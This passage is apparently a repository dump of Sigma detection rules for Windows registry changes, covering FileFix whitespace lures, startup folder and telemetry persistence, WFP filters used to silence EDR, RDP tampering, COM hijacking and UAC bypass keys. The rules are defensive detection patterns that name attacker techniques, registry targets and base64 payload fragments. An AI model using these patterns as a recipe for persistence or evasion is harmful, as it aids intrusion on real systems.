    "content": "title: Suspicious Space Characters in TypedPaths Registry Path - FileFix\nid: 8f2a5c3d-9e4b-4a7c-8d1f-2e5a6b9c3d7e\nrelated:\n    - id: 3ae9974a-eb09-4044-8e70-8980a50c12c8\n      type: similar\nstatus: experimental\ndescription: |\n    Detects the occurrence of numerous space characters in TypedPaths registry paths, which may indicate execution via phishing lures using file-fix techniques to hide malicious commands.\nreferences:\n    - https://expel.com/blog/cache-smuggling-when-a-picture-isnt-a-thousand-words/\n    - https://mrd0x.com/filefix-clickfix-alternative/\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2025-11-04\ntags:\n    - attack.execution\n    - attack.t1204.004\n    - attack.defense-evasion\n    - attack.t1027.010\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection_key:\n        TargetObject|endswith: '\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\TypedPaths\\url1'\n        Details|contains: '#'\n    selection_space_variation:\n        Details|contains:\n            - '            ' # En Quad (U+2000)\n            - '            ' # Em Quad (U+2001)\n            - '            ' # En Space (U+2002)\n            - '            ' # Em Space (U+2003)\n            - '            ' # Three-Per-Em Space (U+2004)\n            - '            ' # Four-Per-Em Space (U+2005)\n            - '            ' # Six-Per-Em Space (U+2006)\n            - '            ' # Figure Space (U+2007)\n            - '            ' # Punctuation Space (U+2008)\n            - '            ' # Thin Space (U+2009)\n            - '            ' # Hair Space (U+200A)\n            - '            ' # No-Break Space (U+00A0)\n            - '            ' # Normal space\n    condition: all of selection_*\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_susp_user_shell_folders.yml",
    "content": "title: Modify User Shell Folders Startup Value\nid: 9c226817-8dc9-46c2-a58d-66655aafd7dc\nrelated:\n    - id: 8f3ab69a-aa22-4943-aa58-e0a52fdf6818\n      type: similar\nstatus: test\ndescription: |\n    Detects modification of the User Shell Folders registry values for Startup or Common Startup which could indicate persistence attempts.\n    Attackers may modify User Shell Folders registry keys to point to malicious executables or scripts that will be executed during startup.\n    This technique is often used to maintain persistence on a compromised system by ensuring that the malicious payload is executed automatically.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/9e5b12c4912c07562aec7500447b11fa3e17e254/atomics/T1547.001/T1547.001.md\n    - https://www.welivesecurity.com/en/eset-research/muddywater-snakes-riverbank/\nauthor: frack113, Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2022-10-01\nmodified: 2026-01-05\ntags:\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.t1547.001\nlogsource:\n    product: windows\n    category: registry_set\ndetection:\n    selection:\n        TargetObject|contains:\n            - 'SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders'\n            - 'SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders'\n        TargetObject|endswith:\n            - '\\Common Startup'\n            - '\\Startup'\n    filter_main_details_null:\n        Details: null\n    filter_main_programdata_startup:\n        Details|contains:\n            - 'C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup'\n            - '%ProgramData%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup'\n    filter_main_userprofile_startup_1:\n        Details|contains:\n            - '%USERPROFILE%\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup'\n            - '%%USERPROFILE%%\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup'\n    filter_main_userprofile_startup_2:\n        Details|contains|all:\n            - 'C:\\Users\\'\n            - '\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup'\n    # Apply more filters if new legitimate paths are identified\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: high\nregression_tests_path: regression_data/rules/windows/registry/registry_set/registry_set_susp_user_shell_folders/info.yml\nsimulation:\n    - type: atomic-red-team\n      name: Change Startup Folder - HKLM Modify User Shell Folders Common Startup Value\n      technique: T1547.001\n      atomic_guid: acfef903-7662-447e-a391-9c91c2f00f7b\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_susp_wfp_filter_added.yml",
    "content": "title: WFP Filter Added via Registry\nid: 1f1d8209-636e-4c6c-a137-781cca8b82f9\nstatus: experimental\ndescription: |\n    Detects registry modifications that add Windows Filtering Platform (WFP) filters, which may be used to block security tools and EDR agents from reporting events.\nreferences:\n    - https://github.com/netero1010/EDRSilencer/blob/0e73a7037ec65c52894d8208e6f605a7da0a34a6/EDRSilencer.c\n    - https://www.huntress.com/blog/silencing-the-edr-silencers\n    - https://www.trendmicro.com/en_us/research/24/j/edrsilencer-disrupting-endpoint-security-solutions.html\nauthor: Frack113\ndate: 2025-10-23\ntags:\n    - attack.defense-evasion\n    - attack.execution\n    - attack.t1562\n    - attack.t1569.002\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|contains: '\\BFE\\Parameters\\Policy\\Persistent\\Filter\\'\n    filter_main_svchost:\n        Image:\n            - 'C:\\Windows\\System32\\svchost.exe'\n            - 'C:\\Windows\\SysWOW64\\svchost.exe'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_suspicious_env_variables.yml",
    "content": "title: Suspicious Environment Variable Has Been Registered\nid: 966315ef-c5e1-4767-ba25-fce9c8de3660\nstatus: test\ndescription: Detects the creation of user-specific or system-wide environment variables via the registry whose values contain suspicious commands and strings\nreferences:\n    - https://infosec.exchange/@sbousseaden/109542254124022664\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-12-20\nmodified: 2023-08-17\ntags:\n    - attack.defense-evasion\n    - attack.persistence\nlogsource:\n    product: windows\n    category: registry_set\ndetection:\n    selection_main:\n        TargetObject|contains: '\\Environment\\'\n    selection_details:\n        - Details:\n              - 'powershell'\n              - 'pwsh'\n        - Details|contains:\n              # Add more suspicious strings in env variables below\n              - '\\AppData\\Local\\Temp\\'\n              - 'C:\\Users\\Public\\'\n              # Base64 MZ Header\n              - 'TVqQAAMAAAAEAAAA' # MZ..........\n              - 'TVpQAAIAAAAEAA8A'\n              - 'TVqAAAEAAAAEABAA'\n              - 'TVoAAAAAAAAAAAAA'\n              - 'TVpTAQEAAAAEAAAA'\n              # Base64 Invoke- (UTF-8)\n              - 'SW52b2tlL'\n              - 'ludm9rZS'\n              - 'JbnZva2Ut'\n              # Base64 Invoke- (UTF-16LE)\n              - 'SQBuAHYAbwBrAGUALQ'\n              - 'kAbgB2AG8AawBlAC0A'\n              - 'JAG4AdgBvAGsAZQAtA'\n        - Details|startswith:  # https://gist.github.com/Neo23x0/6af876ee72b51676c82a2db8d2cd3639\n              - 'SUVY'\n              - 'SQBFAF'\n              - 'SQBuAH'\n              - 'cwBhA'\n              - 'aWV4'\n              - 'aQBlA'\n              - 'R2V0'\n              - 'dmFy'\n              - 'dgBhA'\n              - 'dXNpbm'\n              - 'H4sIA'\n              - 'Y21k'\n              - 'cABhAH'\n              - 'Qzpc'\n              - 'Yzpc'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_system_lsa_nolmhash.yml",
    "content": "title: Enable LM Hash Storage\nid: c420410f-c2d8-4010-856b-dffe21866437\nrelated:\n    - id: 98dedfdd-8333-49d4-9f23-d7018cccae53 # process_creation\n      type: similar\nstatus: test\ndescription: |\n    Detects changes to the \"NoLMHash\" registry value in order to allow Windows to store LM Hashes.\n    By setting this registry value to \"0\" (DWORD), Windows will be allowed to store a LAN manager hash of your password in Active Directory and local SAM databases.\nreferences:\n    - https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-347a\n    - https://learn.microsoft.com/en-us/troubleshoot/windows-server/windows-security/prevent-windows-store-lm-hash-password\n    - https://www.sans.org/blog/protecting-privileged-domain-accounts-lm-hashes-the-good-the-bad-and-the-ugly/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-12-15\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.t1112\nlogsource:\n    product: windows\n    category: registry_set\ndetection:\n    selection:\n        TargetObject|endswith: 'System\\CurrentControlSet\\Control\\Lsa\\NoLMHash'\n        Details: 'DWORD (0x00000000)'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_taskcache_entry.yml",
    "content": "title: Scheduled TaskCache Change by Uncommon Program\nid: 4720b7df-40c3-48fd-bbdf-fd4b3c464f0d\nstatus: test\ndescription: Detects the creation of a new key under 'TaskCache' when a new scheduled task is registered by a process other than svchost.exe, which is suspicious\nreferences:\n    - https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/\n    - https://labs.f-secure.com/blog/scheduled-task-tampering/\nauthor: Syed Hasan (@syedhasan009)\ndate: 2021-06-18\nmodified: 2025-10-22\ntags:\n    - attack.privilege-escalation\n    - attack.execution\n    - attack.persistence\n    - attack.t1053\n    - attack.t1053.005\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|contains: 'SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\'\n    filter_main_empty:\n        Details: '(Empty)'\n    filter_main_null:\n        Details: null\n    filter_main_other:\n        TargetObject|contains:\n            - 'Microsoft\\Windows\\UpdateOrchestrator'\n            - 'Microsoft\\Windows\\SoftwareProtectionPlatform\\SvcRestartTask\\Index'\n            - 'Microsoft\\Windows\\Flighting\\OneSettings\\RefreshCache\\Index'\n    filter_main_mousocoreworker:\n        Image|endswith: 'C:\\Windows\\System32\\MoUsoCoreWorker.exe'\n    filter_main_services:\n        Image|endswith: 'C:\\Windows\\System32\\services.exe'\n    filter_main_tiworker:\n        Image|startswith: 'C:\\Windows\\'\n        Image|endswith: '\\TiWorker.exe'\n    filter_main_svchost:\n        Image: 'C:\\WINDOWS\\system32\\svchost.exe'\n    filter_main_ngen:\n        Image|startswith: 'C:\\Windows\\Microsoft.NET\\Framework' # \\Framework\\ and \\Framework64\\\n        Image|endswith: '\\ngen.exe'\n        TargetObject|contains:\n            - '\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\{B66B135D-DA06-4FC4-95F8-7458E1D10129}'\n            - '\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tree\\Microsoft\\Windows\\.NET Framework\\.NET Framework NGEN'\n    filter_main_office:\n        Image:\n            - 'C:\\Program Files\\Microsoft Office\\root\\Integration\\Integrator.exe'\n            - 'C:\\Program Files (x86)\\Microsoft Office\\root\\Integration\\Integrator.exe'\n            - 'C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeC2RClient.exe'\n            - 'C:\\Program Files (x86)\\Common Files\\microsoft shared\\ClickToRun\\OfficeC2RClient.exe'\n    filter_main_msiexec:\n        Image: 'C:\\Windows\\System32\\msiexec.exe'\n    filter_main_explorer:\n        Image: 'C:\\Windows\\explorer.exe'\n        TargetObject|contains: '\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tree\\Microsoft\\Windows\\PLA\\Server Manager Performance Monitor\\'\n    filter_main_system:\n        Image: 'System'\n    filter_main_runtimebroker:\n        Image: 'C:\\Windows\\System32\\RuntimeBroker.exe'\n    filter_optional_dropbox_updater:\n        Image:\n            - 'C:\\Program Files (x86)\\Dropbox\\Update\\DropboxUpdate.exe'\n            - 'C:\\Program Files\\Dropbox\\Update\\DropboxUpdate.exe'\n    filter_optional_edge:\n        Image|endswith:\n            - 'C:\\Program Files (x86)\\Microsoft\\EdgeUpdate\\MicrosoftEdgeUpdate.exe'\n            - 'C:\\Program Files\\Microsoft\\EdgeUpdate\\MicrosoftEdgeUpdate.exe'\n    filter_optional_onedrive:\n        Image|endswith:\n            - 'C:\\Program Files (x86)\\Microsoft OneDrive\\OneDrive.exe'\n            - 'C:\\Program Files\\Microsoft OneDrive\\OneDrive.exe'\n    condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_telemetry_persistence.yml",
    "content": "title: Potential Registry Persistence Attempt Via Windows Telemetry\nid: 73a883d0-0348-4be4-a8d8-51031c2564f8\nrelated:\n    - id: 4e8d5fd3-c959-441f-a941-f73d0cdcdca5\n      type: obsolete\nstatus: test\ndescription: |\n    Detects potential persistence behavior using the Windows telemetry registry key.\n    Windows telemetry makes use of the binary CompatTelRunner.exe to run a variety of commands and perform the actual telemetry collections.\n    This binary was created to be easily extensible, and to that end, it relies on the registry to tell it which commands to run.\n    The problem is that it will run any arbitrary command without restriction of location or type.\nreferences:\n    - https://www.trustedsec.com/blog/abusing-windows-telemetry-for-persistence/\nauthor: Lednyov Alexey, oscd.community, Sreeman\ndate: 2020-10-16\nmodified: 2023-08-17\ntags:\n    - attack.privilege-escalation\n    - attack.execution\n    - attack.persistence\n    - attack.t1053.005\nlogsource:\n    category: registry_set\n    product: windows\n    definition: 'Requirements: Sysmon config that monitors \\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\TelemetryController subkey of the HKLM hives'\ndetection:\n    selection:\n        TargetObject|contains: '\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\TelemetryController\\'\n        TargetObject|endswith: '\\Command'\n        Details|contains:\n            - '.bat'\n            - '.bin'\n            - '.cmd'\n            - '.dat'\n            - '.dll'\n            - '.exe'\n            - '.hta'\n            - '.jar'\n            - '.js'\n            - '.msi'\n            - '.ps'\n            - '.sh'\n            - '.vb'\n    filter_main_generic:\n        Details|contains:\n            - '\\system32\\CompatTelRunner.exe'\n            - '\\system32\\DeviceCensus.exe'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_terminal_server_suspicious.yml",
    "content": "title: RDP Sensitive Settings Changed to Zero\nid: a2863fbc-d5cb-48d5-83fb-d976d4b1743b\nrelated:\n    - id: 3f6b7b62-61aa-45db-96bd-9c31b36b653c\n      type: similar\n    - id: 4b8f6d3a-9c5e-4f2a-a7d8-6b9c3e5f2a8d\n      type: similar\nstatus: test\ndescription: |\n    Detects tampering with sensitive RDP Terminal Service/Server settings.\n    Examples include allowing unauthorized users access to a system via 'fAllowUnsolicited' or enabling RDP via 'fDenyTSConnections'.\nreferences:\n    - https://web.archive.org/web/20200929062532/https://blog.menasec.net/2019/02/threat-hunting-rdp-hijacking-via.html # Related to RDP hijacking via the \"ServiceDll\" key\n    - http://woshub.com/rds-shadow-how-to-connect-to-a-user-session-in-windows-server-2012-r2/ # Related to the Shadow RDP technique\n    - https://twitter.com/SagieSec/status/1469001618863624194?t=HRf0eA0W1YYzkTSHb-Ky1A&s=03 # Related to the Shadow RDP technique\n    - https://threathunterplaybook.com/hunts/windows/190407-RegModEnableRDPConnections/notebook.html\n    - https://bazaar.abuse.ch/sample/6f3aa9362d72e806490a8abce245331030d1ab5ac77e400dd475748236a6cc81/\n    - http://etutorials.org/Microsoft+Products/microsoft+windows+server+2003+terminal+services/Chapter+6+Registry/Registry+Keys+for+Terminal+Services/ # Contains descriptions for most of the keys mentioned here (check it out if you want more information)\n    - https://admx.help/HKLM/SOFTWARE/Policies/Microsoft/Windows%20NT/Terminal%20Services # Contains descriptions for most of the keys mentioned here (check it out if you want more information)\nauthor: Samir Bousseaden, David ANDRE, Roberto Rodriguez @Cyb3rWard0g, Nasreddine Bencherchali\ndate: 2022-09-29\nmodified: 2022-11-26\ntags:\n    - attack.defense-evasion\n    - attack.persistence\n    - attack.t1112\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|endswith:\n            - '\\fDenyTSConnections' # Specifies whether Remote Desktop connections are enabled - When set to zero RDP is enabled\n            - '\\fSingleSessionPerUser' # When changed to 0 it allows multiple RDP sessions\n            - '\\UserAuthentication' # Specifies that Network-Level user authentication is not required before the remote desktop connection is established\n        Details: 'DWORD (0x00000000)'\n    condition: selection\nfalsepositives:\n    - Some of the keys mentioned here could be modified by an administrator while setting group policy (it should be investigated either way)\nlevel: medium\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_terminal_server_tampering.yml",
    "content": "title: RDP Sensitive Settings Changed\nid: 3f6b7b62-61aa-45db-96bd-9c31b36b653c\nrelated:\n    - id: 171b67e1-74b4-460e-8d55-b331f3e32d67\n      type: obsolete\n    - id: 41904ebe-d56c-4904-b9ad-7a77bdf154b3\n      type: obsolete\n    - id: a2863fbc-d5cb-48d5-83fb-d976d4b1743b\n      type: similar\nstatus: test\ndescription: |\n    Detects tampering with sensitive RDP Terminal Service/Server settings.\n    Examples include allowing unauthorized users access to a system via 'fAllowUnsolicited' or enabling RDP via 'fDenyTSConnections'.\n\n    Below is a list of registry keys/values that are monitored by this rule:\n\n    - Shadow: Used to enable Remote Desktop shadowing, which allows an administrator to view or control a user's session.\n    - DisableRemoteDesktopAntiAlias: Disables anti-aliasing for remote desktop sessions.\n    - DisableSecuritySettings: Disables certain security settings for Remote Desktop connections.\n    - fAllowUnsolicited: Allows unsolicited remote assistance offers.\n    - fAllowUnsolicitedFullControl: Allows unsolicited remote assistance offers with full control.\n    - InitialProgram: Specifies a program to run automatically when a user logs on to a remote computer.\n    - ServiceDll: Used in RDP hijacking techniques to specify a custom DLL to be loaded by the Terminal Services service.\n    - SecurityLayer: Specifies the security layer used for RDP connections.\nreferences:\n    - http://etutorials.org/Microsoft+Products/microsoft+windows+server+2003+terminal+services/Chapter+6+Registry/Registry+Keys+for+Terminal+Services/ # Contains descriptions for most of the keys mentioned here (check it out if you want more information)\n    - http://woshub.com/rds-shadow-how-to-connect-to-a-user-session-in-windows-server-2012-r2/ # Related to the Shadow RDP technique\n    - https://admx.help/HKLM/SOFTWARE/Policies/Microsoft/Windows%20NT/Terminal%20Services # Contains descriptions for most of the keys mentioned here (check it out if you want more information)\n    - https://bazaar.abuse.ch/sample/6f3aa9362d72e806490a8abce245331030d1ab5ac77e400dd475748236a6cc81/\n    - https://blog.sekoia.io/darkgate-internals/\n    - https://blog.talosintelligence.com/understanding-the-phobos-affiliate-structure/\n    - https://github.com/redcanaryco/atomic-red-team/blob/02c7d02fe1f1feb0fc7944550408ea8224273994/atomics/T1112/T1112.md#atomic-test-63---disable-remote-desktop-anti-alias-setting-through-registry\n    - https://github.com/redcanaryco/atomic-red-team/blob/02c7d02fe1f1feb0fc7944550408ea8224273994/atomics/T1112/T1112.md#atomic-test-64---disable-remote-desktop-security-settings-through-registry\n    - https://github.com/redcanaryco/atomic-red-team/blob/dd526047b8c399c312fee47d1e6fb531164da54d/atomics/T1112/T1112.yaml#L790\n    - https://learn.microsoft.com/en-us/windows-hardware/customize/desktop/unattend/microsoft-windows-terminalservices-rdp-winstationextensions-securitylayer\n    - https://threathunterplaybook.com/hunts/windows/190407-RegModEnableRDPConnections/notebook.html\n    - https://twitter.com/SagieSec/status/1469001618863624194?t=HRf0eA0W1YYzkTSHb-Ky1A&s=03 # Related to the Shadow RDP technique\n    - https://web.archive.org/web/20200929062532/https://blog.menasec.net/2019/02/threat-hunting-rdp-hijacking-via.html # Related to RDP hijacking via the \"ServiceDll\" key\n    - https://www.trendmicro.com/en_us/research/25/i/unmasking-the-gentlemen-ransomware.html\nauthor: Samir Bousseaden, David ANDRE, Roberto Rodriguez @Cyb3rWard0g, Nasreddine Bencherchali\ndate: 2022-08-06\nmodified: 2025-11-22\ntags:\n    - attack.defense-evasion\n    - attack.persistence\n    - attack.t1112\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection_shadow:\n        TargetObject|contains:\n            - '\\Control\\Terminal Server\\'\n            - '\\Windows NT\\Terminal Services\\'\n        TargetObject|endswith: '\\Shadow'\n        Details:\n            - 'DWORD (0x00000001)' # Full Control with user’s permission\n            - 'DWORD (0x00000002)' # Full Control without user’s permission\n            - 'DWORD (0x00000003)' # View Session with user’s permission\n            - 'DWORD (0x00000004)' # View Session without user’s permission\n    selection_terminal_services_key:\n        TargetObject|contains:\n            - '\\Control\\Terminal Server\\'\n            - '\\Windows NT\\Terminal Services\\'\n        TargetObject|endswith:\n            - '\\DisableRemoteDesktopAntiAlias' # Disable anti-aliasing for remote desktop (DarkGate malware)\n            - '\\DisableSecuritySettings' # Disable security settings, allowing access to programs/entire desktop (DarkGate malware)\n            - '\\fAllowUnsolicited' # Allow unsolicited remote assistance offers\n            - '\\fAllowUnsolicitedFullControl'\n        Details: 'DWORD (0x00000001)'\n    selection_tamper_only:\n        # Any changes to these keys should be suspicious and looked at\n        TargetObject|contains:\n            - '\\Control\\Terminal Server\\InitialProgram' # This value can be set to specify a program to run automatically when a user logs on to a remote computer.\n            - '\\Control\\Terminal Server\\WinStations\\RDP-Tcp\\InitialProgram' # This value can be set to specify a program to run automatically when a user logs on to a remote computer.\n            - '\\services\\TermService\\Parameters\\ServiceDll' # RDP hijacking\n            - '\\Terminal Server\\WinStations\\RDP-Tcp\\SecurityLayer'\n            - '\\Windows NT\\Terminal Services\\InitialProgram' # This value can be set to specify a program to run automatically when a user logs on to a remote computer.\n    filter_main_securitylayer_tls:\n        TargetObject|endswith: '\\SecurityLayer'\n        Details: 'DWORD (0x00000002)' # TLS Enabled\n    condition: (selection_shadow or selection_terminal_services_key or selection_tamper_only) and not 1 of filter_main_*\nfalsepositives:\n    - Some of the keys mentioned here could be modified by an administrator while setting group policy (it should be investigated either way)\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_timeproviders_dllname.yml",
    "content": "title: New TimeProviders Registered With Uncommon DLL Name\nid: e88a6ddc-74f7-463b-9b26-f69fc0d2ce85\nstatus: test\ndescription: |\n    Detects processes setting a new DLL in the DllName value under HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\W32Time\\TimeProvider.\n    Adversaries may abuse time providers to execute DLLs when the system boots.\n    The Windows Time service (W32Time) enables time synchronization across and within domains.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.003/T1547.003.md\nauthor: frack113\ndate: 2022-06-19\nmodified: 2024-03-26\ntags:\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.t1547.003\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|contains: '\\Services\\W32Time\\TimeProviders'\n        TargetObject|endswith: '\\DllName'\n    filter_main_w32time:\n        Details:\n            - '%SystemRoot%\\System32\\vmictimeprovider.dll'\n            - '%systemroot%\\system32\\w32time.dll'\n            - 'C:\\Windows\\SYSTEM32\\w32time.DLL'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_tls_protocol_old_version_enabled.yml",
    "content": "title: Old TLS1.0/TLS1.1 Protocol Version Enabled\nid: 439957a7-ad86-4a8f-9705-a28131c6821b\nstatus: test\ndescription: Detects applications or users re-enabling old TLS versions by setting the \"Enabled\" value to \"1\" for the \"Protocols\" registry key.\nreferences:\n    - https://techcommunity.microsoft.com/t5/windows-it-pro-blog/tls-1-0-and-tls-1-1-soon-to-be-disabled-in-windows/ba-p/3887947\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-09-05\ntags:\n    - attack.defense-evasion\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|contains:\n            - '\\Control\\SecurityProviders\\SCHANNEL\\Protocols\\TLS 1.0\\'\n            - '\\Control\\SecurityProviders\\SCHANNEL\\Protocols\\TLS 1.1\\'\n        TargetObject|endswith: '\\Enabled'\n        Details: 'DWORD (0x00000001)'\n    condition: selection\nfalsepositives:\n    - Legitimate enabling of old TLS versions due to incompatibility\nlevel: medium\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_treatas_persistence.yml",
    "content": "title: COM Hijacking via TreatAs\nid: dc5c24af-6995-49b2-86eb-a9ff62199e82\nstatus: test\ndescription: Detects modification of the TreatAs key to enable the \"rundll32.exe -sta\" command\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1546.015/T1546.015.md\n    - https://www.youtube.com/watch?v=3gz1QmiMhss&t=1251s\nauthor: frack113\ndate: 2022-08-28\nmodified: 2025-07-11\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1546.015\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|endswith: 'TreatAs\\(Default)'\n    filter_office:\n        Image|startswith: 'C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\'\n        Image|endswith: '\\OfficeClickToRun.exe'\n    filter_office2:\n        Image:\n            - 'C:\\Program Files\\Microsoft Office\\root\\integration\\integrator.exe'\n            - 'C:\\Program Files (x86)\\Microsoft Office\\root\\integration\\integrator.exe'\n    filter_svchost:\n        # Example of target object by svchost\n        # TargetObject: HKLM\\SOFTWARE\\Microsoft\\MsixRegistryCompatibility\\Package\\Microsoft.Paint_11.2208.6.0_x64__8wekyb3d8bbwe\\User\\SOFTWARE\\Classes\\CLSID\\{0003000A-0000-0000-C000-000000000046}\\TreatAs\\(Default)\n        # TargetObject: HKU\\S-1-5-21-1000000000-000000000-000000000-0000_Classes\\CLSID\\{0003000A-0000-0000-C000-000000000046}\\TreatAs\\(Default)\n        Image: 'C:\\Windows\\system32\\svchost.exe'\n    filter_msiexec:\n        # This FP has been seen during installation/updates\n        Image:\n            - 'C:\\Windows\\system32\\msiexec.exe'\n            - 'C:\\Windows\\SysWOW64\\msiexec.exe'\n    condition: selection and not 1 of filter_*\nfalsepositives:\n    - Legitimate use\nlevel: medium\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_turn_on_dev_features.yml",
    "content": "title: Potential Signing Bypass Via Windows Developer Features - Registry\nid: b110ebaf-697f-4da1-afd5-b536fa27a2c1\nrelated:\n    - id: a383dec4-deec-4e6e-913b-ed9249670848\n      type: similar\nstatus: test\ndescription: Detects the enablement of developer features such as \"Developer Mode\" or \"Application Sideloading\", which allows the user to install untrusted packages.\nreferences:\n    - https://twitter.com/malmoeb/status/1560536653709598721\n    - https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-01-12\nmodified: 2023-08-17\ntags:\n    - attack.defense-evasion\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|contains:\n            - '\\Microsoft\\Windows\\CurrentVersion\\AppModelUnlock'\n            - '\\Policies\\Microsoft\\Windows\\Appx\\'\n        TargetObject|endswith:\n            - '\\AllowAllTrustedApps'\n            - '\\AllowDevelopmentWithoutDevLicense'\n        Details: 'DWORD (0x00000001)'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_uac_bypass_eventvwr.yml",
    "content": "title: UAC Bypass via Event Viewer\nid: 7c81fec3-1c1d-43b0-996a-46753041b1b6\nstatus: test\ndescription: Detects UAC bypass method using Windows event viewer\nreferences:\n    - https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/\n    - https://www.hybrid-analysis.com/sample/e122bc8bf291f15cab182a5d2d27b8db1e7019e4e96bb5cdbd1dfe7446f3f51f?environmentId=100\nauthor: Florian Roth (Nextron Systems)\ndate: 2017-03-19\nmodified: 2023-09-28\ntags:\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1548.002\n    - car.2019-04-001\nlogsource:\n    product: windows\n    category: registry_set\ndetection:\n    selection:\n        TargetObject|endswith: '\\mscfile\\shell\\open\\command'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_uac_bypass_sdclt.yml",
    "content": "title: UAC Bypass via Sdclt\nid: 5b872a46-3b90-45c1-8419-f675db8053aa\nstatus: test\ndescription: Detects the pattern of UAC Bypass using registry key manipulation of sdclt.exe (e.g. UACMe 53)\nreferences:\n    - https://enigma0x3.net/2017/03/17/fileless-uac-bypass-using-sdclt-exe/\n    - https://github.com/hfiref0x/UACME\nauthor: Omer Yampel, Christian Burkard (Nextron Systems)\ndate: 2017-03-17\nmodified: 2023-08-17\ntags:\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1548.002\n    - car.2019-04-001\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection1:\n        TargetObject|endswith: 'Software\\Classes\\exefile\\shell\\runas\\command\\isolatedCommand'\n    selection2:\n        TargetObject|endswith: 'Software\\Classes\\Folder\\shell\\open\\command\\SymbolicLinkValue'\n        Details|re: '-1[0-9]{3}\\\\Software\\\\Classes\\\\'\n    condition: 1 of selection*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_uac_bypass_winsat.yml",
